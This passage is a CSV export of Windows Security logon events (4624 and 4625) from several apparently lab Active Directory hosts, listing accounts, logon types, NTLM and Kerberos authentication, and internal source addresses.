4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 
00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + 
MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 
00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 
01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 72742 + + + + + Security + 02694w-win10.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + THREEBEESCO.COM + 0x8a38de + 3 + Kerberos + Kerberos + - + 35D5E180-95BD-9ED7-7EFE-C355D7215A87 + - + - + 0 + 0x0 + - + 127.0.0.1 + 50163 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2019-03-18T15:06:29.911579+04:00,1552907189.911579,4624,user01,EXAMPLE,9,seclogo,::1,,PC01.example.corp,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 432903 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x4530f0f + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3ec + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563342 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x116c7b + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - 
+ - + 0 + 0x0 + - + ::1 + 55589 + %%1833 + +" +2019-03-19T02:16:09.458302+04:00,1552947369.458302,4624,user01,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563300 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x110085 + 3 + Kerberos + Kerberos + + 31E347DC-FF67-08B3-EADC-1EC267B1975B + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.676748+04:00,1552947349.676748,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,PC01,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563297 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fc09 + 3 + NtLmSsp + NTLM + PC01 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.614293+04:00,1552947349.614293,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563294 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbeb + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 + 0x0 + - + 10.0.2.17 + 49249 + %%1833 + +" +2019-03-19T02:15:49.598756+04:00,1552947349.598756,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563285 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x10fbcc + 3 + Kerberos + Kerberos + + BAEC19DA-130D-80F0-BD26-78045EE64D62 + - + - + 0 
+ 0x0 + - + 10.0.2.17 + 49244 + %%1833 + +" +2019-03-19T02:15:49.567435+04:00,1552947349.567435,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 563265 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x10fac2 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 55585 + %%1840 + +" +2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65971 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24db24 + 3 + Kerberos + Kerberos + - + 5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB + - + - + 0 + 0x0 + - + ::1 + 50152 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65969 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-2895268558-4179327395-2773671012-1108 + EXCHANGE$ + ICORP + 0x24daa6 + 3 + NtLmSsp + NTLM + EXCHANGE + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 0 + 0x0 + - + 192.168.111.87 + 58128 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 65967 + + + + + Security + ICORP-DC.internal.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + ICORP-DC$ + INTERNAL.CORP + 0x24c879 + 3 + Kerberos + Kerberos + - + 94BA67EA-8490-3C86-6DB7-DF74C9AA4449 + - + - + 0 + 0x0 + - + 127.0.0.1 
+ 50151 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 10113 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x2e4ce + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x38f87e + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1b90 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + l + o + %%1843 + 0x0 + %%1843 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982101 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x73b44c + 3 + Kerberos + Kerberos + - + E8C9AC4A-31FC-C37F-B4D7-B3217C608858 + - + - + 0 + 0x0 + - + ::1 + 64849 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982097 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738cf9 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50616 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982092 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + 
S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738ce4 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50614 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982089 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + 3B + 0x738afd + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.19 + 50613 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2982084 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-101606 + lgrove + THREEBEESCO.COM + 0x738ae4 + 3 + Kerberos + Kerberos + - + DCED4BA6-CF24-37EF-0627-B0E4EED7F565 + - + - + 0 + 0x0 + - + 172.16.66.19 + 50609 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566894 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x18423d + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + fe80::79bf:8ee2:433c:2567 + 56034 + %%1840 + +" +2019-03-19T04:02:21.929554+04:00,1552953741.929554,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 
4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566889 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + WIN-77LTAPHIQ1R$ + EXAMPLE + 0x184212 + 3 + Kerberos + Kerberos + + 5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C + - + - + 0 + 0x0 + - + ::1 + 56033 + %%1833 + +" +2019-03-19T04:02:04.319945+04:00,1552953724.319945,4624,Administrator,EXAMPLE,3,NtLmSsp,-,,WIN-77LTAPHIQ1R.example.corp,Security," + + + + + 4624 + 1 + 0 + 12544 + 0 + 0x8020000000000000 + + + 566835 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + 3 + NtLmSsp + NTLM + + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + +" 